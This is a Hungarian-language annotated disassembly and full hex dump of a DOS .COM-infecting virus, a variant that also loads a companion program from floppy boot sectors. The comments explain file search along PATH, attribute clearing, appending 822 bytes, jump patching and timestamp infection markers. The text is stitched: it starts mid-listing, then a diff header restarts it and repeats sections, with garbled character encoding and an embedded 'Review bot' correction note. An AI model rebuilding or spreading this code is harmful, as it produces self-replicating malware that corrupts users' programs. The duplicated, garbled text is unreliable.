0228 8BD8 MOV BX,AX ;Handle
;A file eredeti (mostani) idejnek lekrdezse:
;{Ez is megtal lhat˘ lenne az ENTRY ter<65>leten!}
022A B80057 MOV AX,5700 ;Get Date & Time
022D CD21 INT 21
022F 898C0400 MOV [SI+0004],CX ;ERE_TIME (02FD)
0233 89940600 MOV [SI+0006],DX ;ERE_DATE (02FF)
;Annak eld”ntse , hogy a kiv lasztott filet t”nkretegye-e ,
;vagy megfert”zze . Lekrdezi a jelenlegi id”t , s ha m sod-
;perceinek sz ma 8-cal oszthat˘ , akkor a filet resetel”v te-
;szi, egybknt pedig megfert”zi. Igy az esetek 2/15-”d rsz-
;ben teszi csak t”nkre a filet.
0237 B42C MOV AH,2C ;A mostani id” lekrdezse
0239 CD21 INT 21
023B 80E607 AND DH,07 ;A m sodpercek als˘ 3 bitje
023E EB0D JMP 024D ;Fert”zs
0240 90 NOP
; Szemt a Reselet”lb”l
0241 B440 MOV AH,40
0243 B90500 MOV CX,0005
0246 8BD6 MOV DX,SI
0248 81C28A00 ADD DX,008A
024C 90 NOP
;-----------------------------------------
; Fert”zs:
;-----------------------------------------
;Az eredeti file els” 3 bytej nak meg”rzse , hogy ks”bb mg
;futtatni lehessen.
024D B43F MOV AH,3F ;Olvas s fileb˘l
024F B90300 MOV CX,0003 ;Az els” 3 byte beolvas sa
0252 BA0A00 MOV DX,000A
0255 90 NOP ;{piszok}
0256 03D6 ADD DX,SI ;ERE_KEZD (0303)
0258 CD21 INT 21
025A 7255 JB 02B1 ;Hib n l vge
025C 3D0300 CMP AX,0003
025F 7550 JNZ 02B1 ;Hib n l vge
;File vgre  ll s, az Łj cˇmek kisz mˇt sa:
0261 B80242 MOV AX,4202 ;File Pointer file vgre  llˇt sa
0264 B90000 MOV CX,0000
0267 BA0000 MOV DX,0000
026A CD21 INT 21
026C 7243 JB 02B1 ;{Itt nem nagyon lehet hiba!}
;A file elejre irand˘ JMP operandus nak kisz mˇt sa:
026E 8BC8 MOV CX,AX ;AX-ben a file hossza
0270 2D0300 SUB AX,0003 ;AX-ben az eltol s a JMP utasˇt s-
;hoz, ahhoz amit a file elejre fog
;majd ˇrni . Igy ez a JMP a file
;mostani vge ut ni bytera fog mu-
;tatni.
0273 89840E00 MOV [SI+000E],AX ;CIM_JMP (0307)
;Az Łj fileon bel<65>li adatter<65>let cˇmnek kisz mˇt sa s be l-
;lˇt sa:
0277 81C1F902 ADD CX,02F9 ;CX az Łj fileon bel<65>li adatter<65>-
027B 8BFE MOV DI,SI ;letre mutat.
027D 81EFF701 SUB DI,01F7 ;A vˇrus els” utasˇt s nak (MOV DX,
;02F9) operandus nak cˇme.
0281 890D MOV [DI],CX ;Ide ˇrja az adatter<65>let cˇmt
;-----------------------------------------
; A vˇrus hozz m solja mag t a filehoz:
;-----------------------------------------
;(A filemutat˘ a file vgre mutat.)
0283 B440 MOV AH,40 ;Ir s fileba.
0285 B93603 MOV CX,0336 ;822 byte (a vˇrus hossza)
0288 8BD6 MOV DX,SI
028A 81EAF901 SUB DX,01F9 ;DX a vˇrus els” bytej ra mutat
028E CD21 INT 21
0290 721F JB 02B1 ;Hib n l vge
0292 3D3603 CMP AX,0336
0295 751A JNZ 02B1 ;Ha nem ˇrta ki mind a 648 byteot
;Az els” 3 byte  t llˇt sa, egy a file vgre mutat˘ ugr˘ uta-
;sˇt sra:
0297 B80042 MOV AX,4200 ;A file pointer a file elejre!
029A B90000 MOV CX,0000
029D BA0000 MOV DX,0000
02A0 CD21 INT 21
02A2 720D JB 02B1 ;{Itt sem lehet hiba!}
02A4 B440 MOV AH,40 ;Ir s fileba
02A6 B90300 MOV CX,0003 ;3 byte
02A9 8BD6 MOV DX,SI
02AB 81C20D00 ADD DX,000D ;B_JMP (0306) DX az ugr˘ utasˇt sra
02AF CD21 INT 21 ;mutat
;Az eredeti id” ( m r a fert”zsjelzssel egy<67>tt ) vissza llˇ-
;t sa:
02B1 8B940600 MOV DX,[SI+0006] ;ERE_DATE (02FF)
02B5 8B8C0400 MOV CX,[SI+0004] ;ERE_TIME (027D)
02B9 81E1E0FF AND CX,FFE0 ;{Teljesen felesleges!}
02BD 81C91F00 OR CX,001F ;M r volt fert”zve jelzs
02C1 B80157 MOV AX,5701 ;Set Date & Time
02C4 CD21 INT 21
;A file lez r sa:
02C6 B43E MOV AH,3E ;Close Handle
02C8 CD21 INT 21
;Az eredeti attributtum vissza llˇt sa:
02CA B80143 MOV AX,4301 ;Set File Attributtum
02CD 8B8C0800 MOV CX,[SI+0008] ;ERE_ATTR (0301)
02D1 BA1F00 MOV DX,001F
02D4 90 NOP
02D5 03D6 ADD DX,SI ;FILE_PATH (0318)
02D7 CD21 INT 21
;DTA vissza llˇt sa az eredeti cˇmre:
02D9 1E PUSH DS
02DA B41A MOV AH,1A ;Set DTA
02DC 8B940000 MOV DX,[SI+0000] ;ERE_DTA_OFS (02F9)
02E0 8E9C0200 MOV DS,[SI+0002] ;ERE_DTA_SEG (02FB)
02E4 CD21 INT 21
02E6 1F POP DS
;-----------------------------------------
; Az eredeti program futtat sa:
;-----------------------------------------
02E7 59 POP CX ;CX vissza llˇt sa
02E8 33C0 XOR AX,AX ;Regiszterek null z sa
02EA 33DB XOR BX,BX
02EC 33D2 XOR DX,DX
02EE 33F6 XOR SI,SI
02F0 BF0001 MOV DI,0100
02F3 57 PUSH DI ;0100 a stackre
02F4 33FF XOR DI,DI
02F6 C2FFFF RET FFFF ;100-on folytat˘dik a vezrls
;SP-- {Hogy minek?}
;-----------------------------------------
; ADAT TERšLET
;-----------------------------------------
;Ide mutat (02F9-re) a vˇrus elejn DX, ks”bb SI,BX.
02F9 ERE_DTA_OFS DW (?) ;[SI+00] Eredeti DTA cˇme
02FB ERE_DTA_SEG DW (?) ;[SI+02]
02FD ERE_TIME DW (?) ;[SI+04] A file eredeti ideje,
02FF ERE_DATE DW (?) ;[SI+06] d tuma,
0301 ERE_ATTR DW (?) ;[SI+08] attributtuma
0303 ERE_KEZD DB 3 DUP (?) ;[SI+0A]
;A file eredeti els” 3 byteja.
;A k”vetkez” 3 byteon lesz az a 3 byte , amit a vˇrus egy meg-
;fert”zend” file elejre fog ˇrni.
0306 B_JMP DB E9 ;[SI+0D]
;JMP gpik˘dja
0307 CIM_JMP DW (?) ;Eltol s (JMP operandusa)
0309 KERES_STR DB '*.COM',0 ;[SI+10]
;Ezt a stringet m solja a
;FILE_NEV_MUT cˇmre
030F PATH_MUT DW (?) ;[SI+16]
;Hol a k”vetkez” aldirectory neve
;az environmenten.
0311 FILE_NEV_MUT DW (?) ;[SI+18]
;Az  tm solt aldirectory m”g mu-
;tat.
;Azt mutatja , hogy hova kell a
;keressi stringet(*.COM), majd a
;file nevt m solni a FILE_PATH-
;on bel<65>l ahhoz, hogy teljes utat
;kapjunk.
0313 STR_PATH DB 'PATH=' ;[SI+1A] Ezt a stringet keresi az
;environment ter<65>leten.
0318 FILE_PATH DB 40 DUP (?);[SI+1F]
;Itt lesz majd a keressi string
;s a fert”zend” file neve Łttal
;egy<67>tt.
;Ide mutat a DTA. Ezt a ter<65>letet fogja a DOS a file adataival
;felt”lteni.
0358 ENTRY DB 15 DUP (?);Fenntartott [SI+5F]
036D ENT_ATTR DB (?) ;Attributtum [SI+74]
036E ENT_IDO DW (?) ;Keletkezs ideje [SI+75]
0370 ENT_DATUM DW (?) ;Keletkezs d tuma [SI+77]
0372 ENT_HOSSZ DW (?) ;Als˘ sz˘ [SI+79]
0374 DW (?) ;Fels” sz˘ [SI+7B]
0376 ENT_NEV DB 0D DUP (?);Megtal lt file neve [SI+7D]
0383 RESET DB EA,F0,FF,00,F0 ;JMP F000:FFF0 [SI+8A]
;Nem haszn lja
;----------------------------------------------------
; A T”lt”get”t behŁz˘ rsz
;----------------------------------------------------
0388 50 PUSH AX ;Regiszterek elmentse
0389 53 PUSH BX
038A 51 PUSH CX
038B 52 PUSH DX
038C 06 PUSH ES
038D 1E PUSH DS
038E 57 PUSH DI
038F 56 PUSH SI
0390 E80000 CALL 0393 ;Lebuk s !! (/g)
0393 5B POP BX ;BX=0393
;A: BOOT beolvas sa/T”lt”get” lekrdezse
0394 BEA55A MOV SI,5AA5 ;T”lt”get” lekrdezse
0397 BFAA55 MOV DI,55AA
039A 0E PUSH CS
039B 07 POP ES
039C 81C3E803 ADD BX,03E8 ;BX=077B
03A0 81FBE803 CMP BX,03E8
03A4 7303 JNB 03A9
03A6 E98200 JMP 042B ;Ha nincs elg szabad mem˘ria a szegmensen
03A9 53 PUSH BX
03AA B80102 MOV AX,0201 ;A:BOOT beolvas sa
03AD BA0000 MOV DX,0000
03B0 B90100 MOV CX,0001
03B3 CD13 INT 13
03B5 5B POP BX
03B6 7308 JNB 03C0
03B8 80FC06 CMP AH,06 ;Ha lemezcsere volt, az nem hiba
03BB 74EC JZ 03A9
03BD EB6C JMP 042B ;Val˘di hiba->vge
03BF 90 NOP
03C0 81FE5AA5 CMP SI,A55A
03C4 7465 JZ 042B ;Vge, ha a T”lt”get” m r a mem˘ri ban van
;Van-e elg szabad mem˘ria a T”lt”get” beolvas s hoz
03C6 8CC8 MOV AX,CS
03C8 050010 ADD AX,1000
03CB 53 PUSH BX
03CC 50 PUSH AX
03CD CD12 INT 12 ;Max mem.
03CF BB4000 MOV BX,0040
03D2 F7E3 MUL BX ;AX-ben a mem˘ria tetejnek szegmense
03D4 2D0010 SUB AX,1000 ;legal bb 4Kb kell a T”lt”get”nek
03D7 8BD8 MOV BX,AX
03D9 58 POP AX ;CS+1000
03DA 3BD8 CMP BX,AX
03DC 7304 JNB 03E2
03DE 5B POP BX
03DF EB4A JMP 042B ;Vge, ha nincs elg szabad mem˘ria
03E1 90 NOP
; A lemez ut˘ls˘ s vj nak megkeresse
03E2 5B POP BX ;BX=077B
03E3 8EC0 MOV ES,AX ;Max mem-1000
03E5 2E CS:
03E6 8B4718 MOV AX,[BX+18] ;S v hossza
03E9 2E CS:
03EA 8B4F1A MOV CX,[BX+1A] ;Oldalak sz ma
03ED F7E1 MUL CX
03EF 8BC8 MOV CX,AX ;Egy cilinder nagys ga
03F1 2E CS:
03F2 8B4713 MOV AX,[BX+13] ;Szektorok sz ma
03F5 BA0000 MOV DX,0000
03F8 F7F1 DIV CX ;Osztva a cilinder nagys g val AL-ben a s v
; Az ut˘ls˘ s v beolvas sa
03FA 81EBE803 SUB BX,03E8 ;BX=0393
03FE 53 PUSH BX
03FF 8AE8 MOV CH,AL ;40/80-dik s v
0401 B101 MOV CL,01
0403 BB0001 MOV BX,0100 ;ES:BX-re olvas !
0406 BA0000 MOV DX,0000
0409 B80802 MOV AX,0208 ;8 szektor beolvas sa
040C CD13 INT 13
040E 5B POP BX
040F 721A JB 042B ;Hib n l vge
; Ha a T”lt”get”t tal l, elindˇtja
0411 53 PUSH BX
0412 BB0001 MOV BX,0100
0415 26 ES:
0416 8B07 MOV AX,[BX]
0418 3D5224 CMP AX,2452 ;Azonosˇt˘
041B 5B POP BX
041C 750D JNZ 042B ;Ha nem T”lt”get”
041E 8BC3 MOV AX,BX
0420 059800 ADD AX,0098 ;AX=042B (A visszatrsre mutat)
0423 0E PUSH CS
0424 50 PUSH AX
0425 B80A01 MOV AX,010A ;T”lt”get” belpsi pontja
0428 06 PUSH ES
0429 50 PUSH AX
042A CB RETF
; Visszatrs
042B 5E POP SI ;Regiszterek vissza
042C 5F POP DI
042D 1F POP DS
042E 07 POP ES
042F 5A POP DX
0430 59 POP CX
0431 5B POP BX
0432 58 POP AX
0433 C3 RET
0434 0000 DW 0000 ;???
A vˇrus hexa dumpja :
0100 51 BA F9 02 FC 8B F2 81-C6 0A 00 BF 00 01 B9 03 Q...............
0110 00 F3 A4 8B F2 B4 30 CD-21 3C 00 75 03 E9 C7 01 ......0.!<.u....
0120 06 B4 2F CD 21 89 9C 00-00 8C 84 02 00 E8 58 02 ../.!.........X.
0130 07 BA 5F 00 90 03 D6 B4-1A CD 21 06 56 8E 06 2C .._.......!.V..,
0140 00 BF 00 00 5E 56 81 C6-1A 00 AC B9 00 80 F2 AE ....^V..........
0150 B9 04 00 AC AE 75 ED E2-FA 5E 07 89 BC 16 00 8B .....u...^......
0160 FE 81 C7 1F 00 8B DE 81-C6 1F 00 8B FE EB 3A 83 ..............:.
0170 BC 16 00 00 75 03 E9 60-01 1E 56 26 8E 1E 2C 00 ....u..`..V&..,.
0180 8B FE 26 8B B5 16 00 81-C7 1F 00 AC 3C 3B 74 0A ..&.........<;t.
0190 3C 00 74 03 AA EB F4 BE-00 00 5B 1F 89 B7 16 00 <.t.......[.....
01A0 80 7D FF 5C 74 03 B0 5C-AA 89 BF 18 00 8B F3 81 .}.\t..\........
01B0 C6 10 00 B9 06 00 F3 A4-8B F3 B4 4E BA 1F 00 90 ...........N....
01C0 03 D6 B9 03 00 CD 21 EB-04 B4 4F CD 21 73 02 EB ......!...O.!s..
01D0 9E 8B 84 75 00 24 1F 3C-1F 74 EE 81 BC 79 00 00 ...u.$.<.t...y..
01E0 FA 77 E6 83 BC 79 00 0A-72 DF 8B BC 18 00 56 81 .w...y..r.....V.
01F0 C6 7D 00 AC AA 3C 00 75-FA 5E B8 00 43 BA 1F 00 .}...<.u.^..C...
0200 90 03 D6 CD 21 89 8C 08-00 B8 01 43 81 E1 FE FF ....!......C....
0210 BA 1F 00 90 03 D6 CD 21-B8 02 3D BA 1F 00 90 03 .......!..=.....
0220 D6 CD 21 73 03 E9 A2 00-8B D8 B8 00 57 CD 21 89 ..!s........W.!.
0230 8C 04 00 89 94 06 00 B4-2C CD 21 80 E6 07 EB 0D ........,.!.....
0240 90 B4 40 B9 05 00 8B D6-81 C2 8A 00 90 B4 3F B9 ..@...........?.
0250 03 00 BA 0A 00 90 03 D6-CD 21 72 55 3D 03 00 75 .........!rU=..u
0260 50 B8 02 42 B9 00 00 BA-00 00 CD 21 72 43 8B C8 P..B.......!rC..
0270 2D 03 00 89 84 0E 00 81-C1 F9 02 8B FE 81 EF F7 -...............
0280 01 89 0D B4 40 B9 36 03-8B D6 81 EA F9 01 CD 21 ....@.6........!
0290 72 1F 3D 36 03 75 1A B8-00 42 B9 00 00 BA 00 00 r.=6.u...B......
02A0 CD 21 72 0D B4 40 B9 03-00 8B D6 81 C2 0D 00 CD .!r..@..........
02B0 21 8B 94 06 00 8B 8C 04-00 81 E1 E0 FF 81 C9 1F !...............
02C0 00 B8 01 57 CD 21 B4 3E-CD 21 B8 01 43 8B 8C 08 ...W.!.>.!..C...
02D0 00 BA 1F 00 90 03 D6 CD-21 1E B4 1A 8B 94 00 00 ........!.......
02E0 8E 9C 02 00 CD 21 1F 59-33 C0 33 DB 33 D2 33 F6 .....!.Y3.3.3.3.
02F0 BF 00 01 57 33 FF C2 FF-FF 80 00 57 0B 96 01 21 ...W3......W...!
0300 00 20 00 E9 00 00 E9 FD-0F 2A 2E 43 4F 4D 00 71 . .......*.COM.q
0310 07 21 07 50 41 54 48 3D-54 45 53 5A 54 2E 43 4F .!.PATH=TESZT.CO
0320 4D 00 4F 4D 00 20 20 20-20 20 20 20 20 20 20 20 M.OM.
0330 20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20
0340 20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20
0350 20 20 20 20 20 20 20 20-03 3F 3F 3F 3F 3F 3F 3F .???????
0360 3F 43 4F 4D 03 03 00 4B-09 A1 7D 73 6F 20 96 01 ?COM...K..}so ..
0370 21 00 00 10 00 00 54 45-53 5A 54 2E 43 4F 4D 00 !.....TESZT.COM.
0380 4F 4D 00 EA F0 FF 00 F0-50 53 51 52 06 1E 57 56 OM......PSQR..WV
0390 E8 00 00 5B BE A5 5A BF-AA 55 0E 07 81 C3 E8 03 ...[..Z..U......
03A0 81 FB E8 03 73 03 E9 82-00 53 B8 01 02 BA 00 00 ....s....S......
03B0 B9 01 00 CD 13 5B 73 08-80 FC 06 74 EC EB 6C 90 .....[s....t..l.
03C0 81 FE 5A A5 74 65 8C C8-05 00 10 53 50 CD 12 BB ..Z.te.....SP...
03D0 40 00 F7 E3 2D 00 10 8B-D8 58 3B D8 73 04 5B EB @...-....X;.s.[.
03E0 4A 90 5B 8E C0 2E 8B 47-18 2E 8B 4F 1A F7 E1 8B J.[....G...O....
03F0 C8 2E 8B 47 13 BA 00 00-F7 F1 81 EB E8 03 53 8A ...G..........S.
0400 E8 B1 01 BB 00 01 BA 00-00 B8 08 02 CD 13 5B 72 ..............[r
0410 1A 53 BB 00 01 26 8B 07-3D 52 24 5B 75 0D 8B C3 .S...&..=R$[u...
0420 05 98 00 0E 50 B8 0A 01-06 50 CB 5E 5F 1F 07 5A ....P....P.^_..Z
0430 59 5B 58 C3 00 00 Y[X...
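Review bot: Several side-comments in this annotated listing contradict the listing's own data and should be corrected so the analysis is not misread; the length check after the 822-byte write says `;Ha nem ˇrta ki mind a 648 byteot` although the operand is `0336` (822) and the header text states the virus is 822 bytes, so it should read `;Ha nem ˇrta ki mind a 822 byteot`. The time-restore line is annotated `;ERE_TIME (027D)` while the data table places ERE_TIME at 02FD, so that cell should be `;ERE_TIME (02FD)`. The size-filter comments also carry the wrong radix: `CMP WORD PTR [SI+0079],FA00` is 64000 decimal, not "64000h", and `CMP WORD PTR [SI+0079],+0A` is 10 decimal, not "10h". These are annotation errors only; the opcode bytes and the hex dump at the end are consistent with each other.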


@ -0,0 +1,669 @@
A Resetel” vˇrus T”lt”get” fle mut nsa
***************************************
A Resetel” vˇrussal teljes egszben megegyezik a fert”z” mechanizmus.
Eltekintve att˘l, hogy ez a mut ns nem tesz t”nkre f jlokat. Az adatter<65>let is
ugyanazon a cˇmen van, ˇgy ugyanŁgy lehet ˇrtani, mint a Resetel”t. A v ltoz s:
a vˇrus hossza 822 byte, minden indˇt s ut n az A:-r˘l megpr˘b lja beolvasni a
BOOT-ot, majd a 40/80-dik s vot. Ha valamelyik T”lt”get”vel fert”z”tt, akkor
elindˇtja a T”lt”get”t !
;Ide (0100-ra) mutat a file elejr”l az ugr˘ utasˇt s.
;Els” feladat: az els” 3 byte visszaˇr sa az eredetire.
0100 51 PUSH CX ;CX a stacken marad mindvgig.
;A k”vetkez” utasˇt s operandus t ( jelen esetben 02F9-et )
;fert”zskor  llˇtja be , ˇgy mindig a helyes cˇmre mutat.
0101 BAF902 MOV DX,02F9 ;Eredeti els” 3 byte cˇme-10h
0104 FC CLD ;( ERE_DTA_OFS)
0105 8BF2 MOV SI,DX
0107 81C60A00 ADD SI,000A ;SI=offset ERE_KEZD
010B BF0001 MOV DI,0100 ;Program eleje
010E B90300 MOV CX,0003 ;3 byte
0111 F3 REPZ
0112 A4 MOVSB ;Az eredeti byteok vissza llˇt sa
;-----------------------------------------
; Install ci˘s rsz:
;-----------------------------------------
;DOS verzi˘ lekrdezse. 1.00-n l kisebb verzi˘n l az eredeti
;program futtat sa: ekkor a vˇrus nem m<>k”dik.
0113 8BF2 MOV SI,DX ;Ezut n SI-ben az adatter<65>let cˇme
0115 B430 MOV AH,30
0117 CD21 INT 21 ;DOS verzi˘ lekrdezse
0119 3C00 CMP AL,00 ;Csak 1.00-n l kisebbnl lp ki
011B 7503 JNZ 0120
011D E9C701 JMP 02E7 ;Eredeti program futtat sa
;Disk Transzfer Address lekrdezse, elmentse
0120 06 PUSH ES
0121 B42F MOV AH,2F
0123 CD21 INT 21 ;DTA leolvas sa (ES:BX), meg”rzse
0125 899C0000 MOV [SI+0000],BX ;ERE_DTA_OFS (02F9)
0129 8C840200 MOV [SI+0002],ES ;ERE_DTA_SEG (02FB)
;-------------------------------------------------------
; A beiktatott behŁz˘ rsz
;-------------------------------------------------------
012D E85802 CALL 0388
0130 07 POP ES
;DTA be llˇt sa ENTRY cˇmre (0358). Igy a FindFirst, FindNext
;DOS funkci˘k ide fogj k m solni a file adatait (nevt,idejt,
;hossz t,stb).
0131 BA5F00 MOV DX,005F
;{Val˘szˇn<CB87>leg rgi assemblerrel ˇrt k a vˇrust, ezrt van itt
;egy NOP utasˇt s.}
0134 90 NOP
0135 03D6 ADD DX,SI
0137 B41A MOV AH,1A
0139 CD21 INT 21 ;DTA  llˇt sa DS:DX-re: ENTRY(0358)
;A PATH-ok cˇmnek megkeresse. Ha az aktu lis k”nyvt rban m r
;mindegyik filet megfert”zte , itt taj lja meg azoknak az al-
;k”nyvt raknak a nevt , amelyekben mg megfert”zend” fileokat
;tal lhat.
013B 06 PUSH ES
013C 56 PUSH SI
013D 8E062C00 MOV ES,[002C];Environment (k”rnyezet) segmense
0141 BF0000 MOV DI,0000 ;ES:DI fog a megfelel” helyre
;(a k”vetkez” directoryra) mutatni
;A k”vetkez” rsz a PATH= sz”veget keresi meg az environment
;ter<65>leten:
0144 5E POP SI
0145 56 PUSH SI
0146 81C61A00 ADD SI,001A ;STR_PATH (0313)
014A AC LODSB ;AL=DS:[SI],SI++
014B B90080 MOV CX,8000 ;max 32k az environment
014E F2 REPNZ
014F AE SCASB ;AL-ES:[DI] Megkeresi a k”vetkez”
;'P' bet<65>t
0150 B90400 MOV CX,0004 ;Mg 4 bet<65> azonosˇt sa
0153 AC LODSB ;AL=DS:[SI],SI++
0154 AE SCASB ;AL-ES:[DI],DI++
0155 75ED JNZ 0144 ;Ugr s, ha a k”vetkez” 4 bet<65> nem
;egyezik (nem 'ATH=')
0157 E2FA LOOP 0153
0159 5E POP SI ;ES:DI mutat az els” PATH-ra
015A 07 POP ES
015B 89BC1600 MOV [SI+0016],DI ;PATH_MUT (030F)
015F 8BFE MOV DI,SI ;{Hogy ez minek ? Ks”bb Łgyis
0161 81C71F00 ADD DI,001F ;fel<65>lˇrja} FILE_PATH (0318)
0165 8BDE MOV BX,SI ;Ezut n BX mutat az adatokra
0167 81C61F00 ADD SI,001F ;SI is a FILE_PATH-ra(0318) mutat
016B 8BFE MOV DI,SI ;{Az el”bb m r be llitotta (?)}
016D EB3A JMP 01A9
;A k”vetkez” PATH-ban megadott aldirectoryt FILE_PATH-ra m -
;solja. Igy a k”vetkez” fileokat m r ebben az aldirectoryban
;fogja keresni.
016F 83BC160000 CMP WORD PTR [SI+0016],+00 ;PATH_MUT (030F)
0174 7503 JNZ 0179
0176 E96001 JMP 02D9 ;Ugr s, ha nincs t”bb PATH aldir.
;(mindet megfert”te m r)
0179 1E PUSH DS
017A 56 PUSH SI
017B 26 ES:
017C 8E1E2C00 MOV DS,[002C] ;Environment segmense
0180 8BFE MOV DI,SI ;(02F9)
0182 26 ES:
0183 8BB51600 MOV SI,[DI+0016] ;PATH_MUT (030F)
0187 81C71F00 ADD DI,001F ;FILE_PATH cˇme (0318)
018B AC LODSB ;AL=DS:[SI] SI++
018C 3C3B CMP AL,3B ;';'
018E 740A JZ 019A
0190 3C00 CMP AL,00
0192 7403 JZ 0197
0194 AA STOSB ;ES:[DI]:=AL DI++
0195 EBF4 JMP 018B ;Źtm sol s ';' vagy #0-ig
;#0-val z rult a PATH bejegyzs => nem lesz t”bb
0197 BE0000 MOV SI,0000
019A 5B POP BX ;Ezut n BX mutat az adatokra
019B 1F POP DS
019C 89B71600 MOV [BX+0016],SI ;PATH_MUT (030F) = 0
;( Nincs t”bb PATH jelzs )
;A k”vetkez” PATH-ban adott aldir. m r  tm solva.
01A0 807DFF5C CMP BYTE PTR [DI-01],5C
01A4 7403 JZ 01A6 ;Ugr s, ha az ut˘ls˘ bet<65> a '\'
01A6 B05C MOV AL,5C ;Egybknt '\' ˇr s
01A8 AA STOSB ;ES:[DI]:=AL DI++
;Egy aldirectory kirtkelse . El”sz”r az aktu lis , majd a
;FILE_PATH -ra m solt aldirectory vgignzse, fert”zs.
;DI a FILE_PATH-ba ˇrt aldirectory neve ut ni pozici˘ra mutat.
;A COM kiterjeszts<E2809A> fileok megkeresse:
01A9 89BF1800 MOV [BX+0018],DI ;FILE_NEV_MUT (0311)
;Ide kell majd a file nevt
;m solni (az aldir. neve ut n)
01AD 8BF3 MOV SI,BX ;(02F9)
01AF 81C61000 ADD SI,0010 ;KERES_STR (0309)
01B3 B90600 MOV CX,0006 ;6 bet<65>  tm sol sa ('*.COM',0)
01B6 F3 REPZ ;A PATH-ban megadott aldirectory
01B7 A4 MOVSB ;m”g , ˇgy teljes keressi utunk
;lesz
01B8 8BF3 MOV SI,BX ;(02F9)
01BA B44E MOV AH,4E ;FIND FIRST ENTRY
01BC BA1F00 MOV DX,001F
01BF 90 NOP
01C0 03D6 ADD DX,SI ;FILE_PATH (0318)
01C2 B90300 MOV CX,0003 ;HIDDEN, READ ONLY
01C5 CD21 INT 21 ;Az els” COM kiterjeszts<E2809A> file
;megkeresse . A file adatait a DTA
; ltal mutatott cˇmre (ENTRY 0358)
;m solja.
01C7 EB04 JMP 01CD
;K”vetkez” COM file keresse (adatai ENTRY-re ker<65>lnek).
01C9 B44F MOV AH,4F ;FIND NEXT
01CB CD21 INT 21
01CD 7302 JNB 01D1
01CF EB9E JMP 016F ;Ha nem tal l t”bb COM filet : —j
;aldirt keres a PATH-ban
;M r tal lt COM filet. Adataival az ENTRY fel van t”ltve.Ennek
;a filenak az ellen”rzse, fert”zse k”vetkezik.
;Annak ellen”rzse , hogy a file megfert”zhet”-e (fert”z”tt-e,
;tŁl hosszŁ-e, tŁl r”vid-e) . Ha nem fert”zhet” visszaugrik Łj
;fileokat keresni.
01D1 8B847500 MOV AX,[SI+0075] ;ENT_IDO (036E) A file ideje
01D5 241F AND AL,1F
01D7 3C1F CMP AL,1F ;Ugr s, ha az als˘ 5 bit 1-es:
01D9 74EE JZ 01C9 ;a file m r fert”z”tt.
01DB 81BC790000FA CMP WORD PTR [SI+0079],FA00 ;ENT_HOSSZ (0372)
01E1 77E6 JA 01C9 ;Ugr s, ha file hossza nagyobb,mint
;64000h (m r nem fr bele a vˇrus)
01E3 83BC79000A CMP WORD PTR [SI+0079],+0A ;ENT_HOSSZ (0372)
01E8 72DF JB 01C9 ;Ugr s, ha r”videbb 10h byten l
;-----------------------------------------
; Megvan a kiv laszott file.
;-----------------------------------------
;A file nevt az aldirectory neve ut n kell m solni , hogy a
;teljes Łt rendelkezs<E2809A>nkre  lljon , ˇgy majd meg tudja nyitni
;a filet.
01EA 8BBC1800 MOV DI,[SI+0018] ;FILE_NEV_MUT (0311) Ide fogja
01EE 56 PUSH SI ;a file nevt m solni
01EF 81C67D00 ADD SI,007D ;ENT_NEV (0376)
01F3 AC LODSB ;AL:=DS:[SI] SI++
01F4 AA STOSB ;ES:[DI]:=AL DI++ (M sol s)
01F5 3C00 CMP AL,00 ;Nvlez r˘ 0-ig m sol
01F7 75FA JNZ 01F3
01F9 5E POP SI ;SI Łjra az adatokra mutat
;A file egyes eredeti inform ci˘inak meg”rzse , hogy a fert”-
;zs ne t<>nj”n fel.
;Az eredeti attributtum meg”rzse:
;{Fogalmam sincs mirt kell a file attributtum t mg egyszer
;lekrdezni , amikor az ENTRY ter<65>leten megtal lhat˘ . Tal n a
;vˇrus ˇr˘ja nem tudta?}
01FA B80043 MOV AX,4300 ;File attributtum nak lekrdezse
01FD BA1F00 MOV DX,001F ;FILE_PATH ([SI+1F] 0318)
0200 90 NOP ;{piszok}
0201 03D6 ADD DX,SI ;DS:DX mutat a file Łtj ra
0203 CD21 INT 21 ;CX-ben az attributtum
0205 898C0800 MOV [SI+0008],CX ;ERE_ATTR (0301)
;A file ˇr svdelmnek t”rlse:
0209 B80143 MOV AX,4301 ;File attributtum nak  llit sa
020C 81E1FEFF AND CX,FFFE ;Read Only jelzs t”rlse
0210 BA1F00 MOV DX,001F ;{ Az el”bb m r be llˇtotta, minek
0213 90 NOP ;Łjra? }
0214 03D6 ADD DX,SI ;FILE_PATH (0318)
0216 CD21 INT 21
;File megnyit sa:
0218 B8023D MOV AX,3D02 ;File megnyit sa ˇr sra, olvas sra
021B BA1F00 MOV DX,001F ;{Mg egyszer be llˇtja!}
021E 90 NOP ;{piszok}
021F 03D6 ADD DX,SI ;FILE_PATH (0318)
0221 CD21 INT 21
0223 7303 JNB 0228
0225 E9A200 JMP 02CA ;Hib n l: nincs fert”zs
0228 8BD8 MOV BX,AX ;Handle
;A file eredeti (mostani) idejnek lekrdezse:
;{Ez is megtal lhat˘ lenne az ENTRY ter<65>leten!}
022A B80057 MOV AX,5700 ;Get Date & Time
022D CD21 INT 21
022F 898C0400 MOV [SI+0004],CX ;ERE_TIME (02FD)
0233 89940600 MOV [SI+0006],DX ;ERE_DATE (02FF)
;Annak eld”ntse , hogy a kiv lasztott filet t”nkretegye-e ,
;vagy megfert”zze . Lekrdezi a jelenlegi id”t , s ha m sod-
;perceinek sz ma 8-cal oszthat˘ , akkor a filet resetel”v te-
;szi, egybknt pedig megfert”zi. Igy az esetek 2/15-”d rsz-
;ben teszi csak t”nkre a filet.
0237 B42C MOV AH,2C ;A mostani id” lekrdezse
0239 CD21 INT 21
023B 80E607 AND DH,07 ;A m sodpercek als˘ 3 bitje
023E EB0D JMP 024D ;Fert”zs
0240 90 NOP
; Szemt a Reselet”lb”l
0241 B440 MOV AH,40
0243 B90500 MOV CX,0005
0246 8BD6 MOV DX,SI
0248 81C28A00 ADD DX,008A
024C 90 NOP
;-----------------------------------------
; Fert”zs:
;-----------------------------------------
;Az eredeti file els” 3 bytej nak meg”rzse , hogy ks”bb mg
;futtatni lehessen.
024D B43F MOV AH,3F ;Olvas s fileb˘l
024F B90300 MOV CX,0003 ;Az els” 3 byte beolvas sa
0252 BA0A00 MOV DX,000A
0255 90 NOP ;{piszok}
0256 03D6 ADD DX,SI ;ERE_KEZD (0303)
0258 CD21 INT 21
025A 7255 JB 02B1 ;Hib n l vge
025C 3D0300 CMP AX,0003
025F 7550 JNZ 02B1 ;Hib n l vge
;File vgre  ll s, az Łj cˇmek kisz mˇt sa:
